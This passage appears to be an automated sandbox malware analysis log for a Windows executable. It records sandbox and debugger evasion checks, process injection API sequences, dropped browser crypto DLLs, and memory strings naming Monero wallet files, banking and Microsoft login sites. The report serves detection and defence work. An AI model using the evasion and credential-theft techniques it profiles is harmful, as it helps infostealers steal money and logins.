etProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00938ADE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: 7ZthFNAqYp.exeBinary or memory string: DIR_WATCH.DLL
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                          Source: 7ZthFNAqYp.exeBinary or memory string: SBIEDLL.DLL
                          Source: 7ZthFNAqYp.exeBinary or memory string: API_LOG.DLL
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,2_2_0092180D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeDropped PE file which has not been started: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exeJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeAPI coverage: 6.5 %
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00930EC3h2_2_00930DB0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00936013
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00929CF1
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0093547D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0092D59B
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00921D80
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0092B5B4
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00934D08
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0092BF22
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0092B914
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00935B4D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0092CD0C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00935182
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930F8F GetSystemInfo,wsprintfA,2_2_00930F8F
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeAPI call chain: ExitProcess graph end nodegraph_2-73959
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeAPI call chain: ExitProcess graph end nodegraph_2-73975
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeAPI call chain: ExitProcess graph end nodegraph_2-75313
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0093D1A8
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00938ADE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009214AD mov eax, dword ptr fs:[00000030h]2_2_009214AD
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092148A mov eax, dword ptr fs:[00000030h]2_2_0092148A
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009214A2 mov eax, dword ptr fs:[00000030h]2_2_009214A2
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938726 mov eax, dword ptr fs:[00000030h]2_2_00938726
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938725 mov eax, dword ptr fs:[00000030h]2_2_00938725
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009310EE GetProcessHeap,HeapAlloc,GlobalMemoryStatusEx,wsprintfA,2_2_009310EE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeProcess created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0093D1A8
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0093DB1C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009477BE SetUnhandledExceptionFilter,2_2_009477BE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CB8AC62

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_0092F51F
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeMemory written: C:\Users\user\Desktop\7ZthFNAqYp.exe base: 920000 value starts with: 4D5AJump to behavior
                          Searches for specific processes (likely to inject)
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0093247D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00932554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00932554
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6CBD4760
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6CAB1C30
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092119E cpuid 2_2_0092119E
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00930DB0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoA,2_2_0094E834
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0094B25C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_0094B3F8
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00949BE0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0094B351
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0094ACD0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0094B453
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_00945573
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00949EFE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_0094E6FF
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: EnumSystemLocalesA,2_2_0094B6E6
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0094B624
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_0094762C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_0094B7B3
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0094B710
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00947706
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00948F54
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0094B777
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeQueries volume information: C:\ VolumeInformationJump to behavior
